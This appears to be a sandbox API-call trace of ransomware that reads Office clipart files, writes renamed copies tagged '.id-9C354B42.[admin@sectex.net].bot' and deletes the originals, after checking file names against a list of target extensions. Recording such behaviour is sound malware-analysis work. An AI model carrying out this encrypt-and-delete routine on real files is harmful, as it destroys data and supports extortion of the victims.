	[0147.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.948] GetLastError () returned 0x0
	[0147.948] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2ce2, lpOverlapped=0x0) returned 1
	[0147.950] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2cf0, lpOverlapped=0x0) returned 1
	[0147.951] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.951] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.951] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.951] CloseHandle (hObject=0x2a0) returned 1
	[0147.952] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.952] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.956] CloseHandle (hObject=0x3c8) returned 1
	[0147.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.956] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf")) returned 1
	[0147.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.957] lstrlenW (lpString=".doc") returned 4
	[0147.957] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.957] lstrlenW (lpString=".docx") returned 5
	[0147.957] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.957] lstrlenW (lpString=".pdf") returned 4
	[0147.957] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.957] lstrlenW (lpString=".xls") returned 4
	[0147.957] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.957] lstrlenW (lpString=".xlsx") returned 5
	[0147.957] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.957] lstrlenW (lpString=".ppt") returned 4
	[0147.957] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.957] lstrlenW (lpString=".zip") returned 4
	[0147.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.958] lstrlenW (lpString=".rar") returned 4
	[0147.958] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString=".bz2") returned 4
	[0147.958] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString=".7z") returned 3
	[0147.958] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.958] lstrlenW (lpString=".dbf") returned 4
	[0147.958] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.958] lstrlenW (lpString=".1cd") returned 4
	[0147.958] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.958] lstrlenW (lpString=".jpg") returned 4
	[0147.958] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.958] lstrlenW (lpString=".doc") returned 4
	[0147.958] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString=".docx") returned 5
	[0147.958] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.958] lstrlenW (lpString=".pdf") returned 4
	[0147.958] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.958] lstrlenW (lpString=".xls") returned 4
	[0147.958] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.958] lstrlenW (lpString=".xlsx") returned 5
	[0147.958] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.958] lstrlenW (lpString=".ppt") returned 4
	[0147.959] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.959] lstrlenW (lpString=".zip") returned 4
	[0147.959] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.959] lstrlenW (lpString=".rar") returned 4
	[0147.959] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.959] lstrlenW (lpString=".bz2") returned 4
	[0147.959] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.959] lstrlenW (lpString=".7z") returned 3
	[0147.959] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.959] lstrlenW (lpString=".dbf") returned 4
	[0147.959] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.959] lstrlenW (lpString=".1cd") returned 4
	[0147.959] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63
	[0147.959] lstrlenW (lpString=".jpg") returned 4
	[0147.959] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.959] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.959] lstrlenW (lpString="HH00681_.WMF") returned 12
	[0147.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.960] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9300) returned 1
	[0147.960] CloseHandle (hObject=0x3c8) returned 1
	[0147.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf")) returned 0x20
	[0147.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.960] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.960] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.961] GetLastError () returned 0x0
	[0147.961] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2454, lpOverlapped=0x0) returned 1
	[0147.963] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2460, lpOverlapped=0x0) returned 1
	[0147.963] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.964] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.964] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.964] CloseHandle (hObject=0x2a0) returned 1
	[0147.964] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.964] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.975] CloseHandle (hObject=0x3c8) returned 1
	[0147.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.975] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf")) returned 1
	[0147.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.976] lstrlenW (lpString=".doc") returned 4
	[0147.976] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.976] lstrlenW (lpString=".docx") returned 5
	[0147.976] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.976] lstrlenW (lpString=".pdf") returned 4
	[0147.976] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.976] lstrlenW (lpString=".xls") returned 4
	[0147.976] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.976] lstrlenW (lpString=".xlsx") returned 5
	[0147.976] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.976] lstrlenW (lpString=".ppt") returned 4
	[0147.976] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.976] lstrlenW (lpString=".zip") returned 4
	[0147.976] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.977] lstrlenW (lpString=".rar") returned 4
	[0147.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString=".bz2") returned 4
	[0147.977] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString=".7z") returned 3
	[0147.977] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.977] lstrlenW (lpString=".dbf") returned 4
	[0147.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.977] lstrlenW (lpString=".1cd") returned 4
	[0147.977] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.977] lstrlenW (lpString=".jpg") returned 4
	[0147.977] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.977] lstrlenW (lpString=".doc") returned 4
	[0147.977] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString=".docx") returned 5
	[0147.977] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.977] lstrlenW (lpString=".pdf") returned 4
	[0147.977] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString=".xls") returned 4
	[0147.977] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.977] lstrlenW (lpString=".xlsx") returned 5
	[0147.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.977] lstrlenW (lpString=".ppt") returned 4
	[0147.977] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.978] lstrlenW (lpString=".zip") returned 4
	[0147.978] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.978] lstrlenW (lpString=".rar") returned 4
	[0147.978] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.978] lstrlenW (lpString=".bz2") returned 4
	[0147.978] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.978] lstrlenW (lpString=".7z") returned 3
	[0147.978] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.978] lstrlenW (lpString=".dbf") returned 4
	[0147.978] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.978] lstrlenW (lpString=".1cd") returned 4
	[0147.978] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63
	[0147.978] lstrlenW (lpString=".jpg") returned 4
	[0147.978] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.978] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.978] lstrlenW (lpString="HH00685_.WMF") returned 12
	[0147.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.979] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4032) returned 1
	[0147.979] CloseHandle (hObject=0x3c8) returned 1
	[0147.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf")) returned 0x20
	[0147.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.979] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.979] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.980] GetLastError () returned 0x0
	[0147.980] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xfc0, lpOverlapped=0x0) returned 1
	[0148.001] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xfd0, lpOverlapped=0x0) returned 1
	[0148.002] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.002] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.002] SetEndOfFile (hFile=0x2a0) returned 1
	[0148.248] CloseHandle (hObject=0x2a0) returned 1
	[0148.248] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.248] SetEndOfFile (hFile=0x3c8) returned 1
	[0148.281] CloseHandle (hObject=0x3c8) returned 1
	[0148.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf")) returned 1
	[0148.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.322] lstrlenW (lpString=".doc") returned 4
	[0148.322] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.322] lstrlenW (lpString=".docx") returned 5
	[0148.322] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.322] lstrlenW (lpString=".pdf") returned 4
	[0148.322] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.322] lstrlenW (lpString=".xls") returned 4
	[0148.322] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.322] lstrlenW (lpString=".xlsx") returned 5
	[0148.322] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.322] lstrlenW (lpString=".ppt") returned 4
	[0148.322] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.322] lstrlenW (lpString=".zip") returned 4
	[0148.322] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.322] lstrlenW (lpString=".rar") returned 4
	[0148.322] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.322] lstrlenW (lpString=".bz2") returned 4
	[0148.322] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.322] lstrlenW (lpString=".7z") returned 3
	[0148.322] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.322] lstrlenW (lpString=".dbf") returned 4
	[0148.322] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.322] lstrlenW (lpString=".1cd") returned 4
	[0148.322] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.323] lstrlenW (lpString=".jpg") returned 4
	[0148.323] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.323] lstrlenW (lpString=".doc") returned 4
	[0148.323] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString=".docx") returned 5
	[0148.323] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.323] lstrlenW (lpString=".pdf") returned 4
	[0148.323] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString=".xls") returned 4
	[0148.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.323] lstrlenW (lpString=".xlsx") returned 5
	[0148.323] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.323] lstrlenW (lpString=".ppt") returned 4
	[0148.323] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.323] lstrlenW (lpString=".zip") returned 4
	[0148.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.323] lstrlenW (lpString=".rar") returned 4
	[0148.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString=".bz2") returned 4
	[0148.323] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString=".7z") returned 3
	[0148.323] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.323] lstrlenW (lpString=".dbf") returned 4
	[0148.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.323] lstrlenW (lpString=".1cd") returned 4
	[0148.324] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 63
	[0148.324] lstrlenW (lpString=".jpg") returned 4
	[0148.324] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.324] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.324] lstrlenW (lpString="HH00687_.WMF") returned 12
	[0148.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.324] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4340) returned 1
	[0148.324] CloseHandle (hObject=0x31c) returned 1
	[0148.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf")) returned 0x20
	[0148.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.325] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.325] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
